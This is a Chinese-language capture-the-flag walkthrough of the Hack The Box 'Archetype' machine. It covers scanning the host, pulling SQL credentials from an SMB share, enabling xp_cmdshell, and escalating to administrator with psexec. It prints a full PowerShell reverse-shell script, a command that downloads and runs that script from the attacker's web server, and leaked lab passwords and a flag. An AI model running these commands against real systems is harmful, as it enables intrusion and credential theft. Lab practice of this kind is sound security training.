1. hack之sql server

by 凯文

安装kali虚拟机

download kali vbox

vbox导入下载的虚拟机

虚拟机账号密码

kali/kali

开启ssh 22端口

systemctl start ssh

连接vpn

sudo openvpn example.ovpn

example.ovpn为vpn文件,如hackthebox 可在Access > here中下载;如果是Starting Point过程中,在Starting Point -> Show Tutorial -> VPN Connection中可下载对应的vpn文件,值得注意的是Starting Point和Methines中的vpn文件是不同的

扫描sqlserver端口,获取管理员权限

确定扫描的机器 ip

在hackthebox首页 machines中查找某ip ,如10.10.10.27

扫描该机器的端口

kali@kali:~$ nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//
135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669

查看对应端口的服务详细信息

> ports=$(nmap -p- --min-rate=1000 -T4  10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
> nmap -sC -sV -p$ports 10.10.10.27

输出结果

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 23:29 EDT
Nmap scan report for bogon (10.10.10.27)
Host is up (0.29s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-08-04T17:53:56
|_Not valid after:  2050-08-04T17:53:56
|_ssl-date: 2020-08-05T03:45:42+00:00; +15m06s from scanner time.
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h39m05s, deviation: 3h07m50s, median: 15m05s
| ms-sql-info:
|   10.10.10.27:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-08-04T20:45:26-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-05T03:45:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.37 seconds

根据上述结果发现开放的端口及端口对应的服务等信息;然后我们可以通过smbclient 或其它工具对上述端口实施准确攻击

smbclient

  • 使用smbclient列出可用的共享
smbclient -N -L \\\\10.10.10.27\\

输出内容

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
  • 查看backups目录下的内容
kali@kali:~$ smbclient -N  \\\\10.10.10.27\\backups
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

		10328063 blocks of size 4096. 8249391 blocks available
  • 查看prod.dtsConfig文件内容
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.5 KiloBytes/sec)

在本地机器的当前目录下查看prod.dtsConfig文件内容

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

连接数据库

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py 
sudo python get-pip.py
  • 下载impacket
git clone https://github.com/SecureAuthCorp/impacket.git

  • 安装impacket依赖
    在目录impacket下执行pip install .pip install tox

  • 安装impacket

  • 连接数据库


python3 impacket/examples/mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

输入密码M3g4c0rp123

报错[-] Missing required parameter 'digestmod'.,将impacket分支调整为0.9.21tag版本
再执行./mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth,并输入密码M3g4c0rp123

  • 测试当前用户拥有的权限
SQL> select IS_SRVROLEMEMBER('sysadmin')

-----------
          1

使用IS_SRVROLEMEMBER函数显示当前SQL用户是否在SQL Server上具有sysadmin(最高级别)特权,1表示具有sysadmin特权。

重新对sql server进行配置

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"

上述过程使我们能够启用xp_cmdshell并在主机上获得RCE

输出

SQL> xp_cmdshell "whoami"
output

--------------------------------------------------------------------------------

archetype\sql_svc

NULL

whoami命令输出显示SQL Server正在用户ARCHETYPE\sql_svc的上下文中运行。但是,此帐户似乎在主机上没有管理权限。

创建外部机器的权限

  • 在当前vbox机器上创建shell脚本
    在个人服务器上创建shell脚本,命名为shell.ps1,内容如下
 $client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • 在当前目录启动web server
sudo  python3 -m http.server 80
  • 将下述内容保存为shell.ps1文件
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.7",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

修改上述ip为vbox虚拟机ip

  • 通过curl测试访问shell.ps1文件是否正常
curl 127.0.0.1:80/shell.ps1
  • 开放443端口
    开放443端口用于接受xp_cmdshell的请求,在该输入栏中输入命令,则可执行
nc -lvnp 443

如果虚拟中开了防火墙,则使用ufw允许端口80和443上的回调回我们的计算机;没有开防火墙则忽略

ufw allow from 10.10.10.27 proto tcp to any port 80,443
  • 通过xp_cmdshell下载上述shell并执行
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.7/shell.ps1\");"
  • vbox虚机中执行命令
    在443端口的控制台中,输入pwd,可正常响应路径。
    在控制台输入type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
#  type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
  • vbox虚拟机上登陆服务器10.10.10.27
psexec.py administrator@10.10.10.27

输入密码MEGACORP_4dm1n!!登陆成功,打开目录C:\Users\Administrator\Desktop,通过dir发现有个文件root.txt,通过type root.txt获取文件内容b91ccec3305e98240082d4474b848528